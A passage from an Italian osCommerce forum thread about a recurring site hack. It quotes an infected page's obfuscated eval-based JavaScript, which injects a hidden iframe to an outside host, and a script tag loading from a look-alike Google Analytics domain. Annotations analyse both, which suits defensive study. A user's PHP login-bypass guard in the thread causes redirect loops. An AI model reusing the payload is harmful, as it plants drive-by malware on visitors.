64/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t
,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];
// Stage 4: `g` is the global object, so ko == window["e"+"va"+"l"]; gh ==
// String.fromCharCode; the loop rebuilds the text and ko(ydxx) evaluates it.
var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel);ydxx+=gh(ch);}ko(ydxx);</script>
<!-- end get_javascript(applicationtop2header) //-->

<link rel="stylesheet" type="text/css" href="includes/sts_templates/carbon-grey/styles/stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<!-- Review note: "google-analyitcs.com" is a look-alike of google-analytics.com
     (two letters swapped) and "stat.js" is not a Google Analytics loader name.
     Unless the shop owner added this tag knowingly, treat it as a second injected
     payload and as an indicator to search the other infected shops for. -->
<script type="text/javascript" src="http://www.google-analyitcs.com/stat.js"></script>

Re: Attacco Hacker no-stop

Inviato: 18/03/2011, 20:37
da Alexfactory
Stesso uguale identico problema anche nel mio shop... le ho provate tutte ma non riesco a risolvere sto problema... continua a generare sempre lo script!

Re: Attacco Hacker no-stop

Inviato: 19/03/2011, 16:12
da maury2ma
esistono dei bug noti (che preferisco non divulgare) che si trovano facilmente in internet e permettono l'accesso alle pagine dell'admin anche protette da htaccess.
cambiate il nome della cartella admin con un nome di fantasia e almeno parate i futuri attacchi.
oscommerce è stato preso di mira da un annetto e stanno cercando di screditarlo rendendo noti tutti i bug in modo da buttare giù i siti 1 ad 1.


se volete fare una piccola modifica all'application_top.php sia admin che catalog aggiungete al fondo questa stringa, aiuta parecchio contro un piccolo bug sfruttato dai pirati informatici e dai rompiballe (gli hacker, quelli seri, non sono pirati.... anche se spesso vengono chiamati così dai media.) che si manifesta in 2 modi diversi: uno per php4 ed un altro su php5


// Checks for unauthorised access that exploits a bug in the system.
// Guard proposed for the end of application_top.php (admin and catalog side):
// it rejects requests whose script path carries a second ".php" component,
// which is how a PATH_INFO-style URL such as "something.php/login.php" shows up,
// and redirects them to index.php.
  // Path of the running script; PHP_SELF is used only when SCRIPT_NAME is absent.
  $url_php_self = !isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
  // Reject when the path contains ".php/" followed by the login, password-forgotten
  // or forbidden script name (whatever the FILENAME_* constants expand to), or
  // when ".php" occurs two or more times.
  if (
          ( (substr_count($url_php_self, ".php/" . FILENAME_LOGIN) ) != 0)
       || ( (substr_count($url_php_self, ".php/" . FILENAME_PASSWORD_FORGOTTEN) ) != 0)
       || ( (substr_count($url_php_self, ".php/" . FILENAME_FORBIDDEN) ) != 0)
       || ( (substr_count($url_php_self, ".php") ) >= 2)
     ) {
    tep_redirect(tep_href_link('index.php'));
  }
  // Second guard: the script's basename must equal $PHP_SELF as set earlier in
  // application_top.php. NOTE(review): whether that ever matches depends on the
  // osCommerce version and mods in use; if $PHP_SELF holds a directory-qualified
  // path (reportedly the case in some admin-side versions) the comparison always
  // fails and index.php, which runs this same code, redirects to itself forever,
  // the "page isn't redirecting properly" error reported later in this thread.
  // Compare both sides in the same form (e.g. both through basename()) for your
  // version before deploying.
  if (basename($url_php_self) != $PHP_SELF) {
    tep_redirect(tep_href_link('index.php'));
  }

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 0:41
da cucuzza1
Scusa ma volevo ascoltare il tuo consiglio ma ho un problema.
Ho inserito nel lato admin nella cartella includes e poi in application_top la stringa che hai dato ma ora non mi fa più accedere al mio pannello.
Ora non solo non posso inserire la stringa nell'altra cartella, ma non riesco proprio ad entrare lato admin quindi come vedo le mie vendite??
Chi può aiutarmi almeno a farmi entrare per cancellare quella stringa...??

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 10:01
da cucuzza1
Ecco cosa mi dice Mozilla:

Questa pagina non reindirizza in modo corretto

Firefox ha rilevato che il server sta reindirizzando la richiesta per questa pagina in modo che non possa mai essere completata.

* Questo problema spesso è causato dal blocco o dal rifiuto dei cookie.

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 10:15
da cucuzza1
Ragazzi, ho risolto facilmente andando a cancellare la modifica direttamente dal file manager sul mio spazio web.
Comunque sono curioso di capire perché non ha funzionato..
Se qualcuno lo sa...

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 10:26
da maury2ma
soprattutto dipende se hai application_top aggiornato con i fix alla sicurezza della versione 2.3.1, se hai mod particolari inclusi e tante altre cose..
insomma devi adattarti il codice in base ai tuoi file.
il controllo di per se è semplice:
controlla che non ci sia scritto
xxx.php/login.php
o log off o password dimenticata
poi controlla che non ci siano nell'indirizzo 2 file".php"
nel qual caso reindirizza al file login.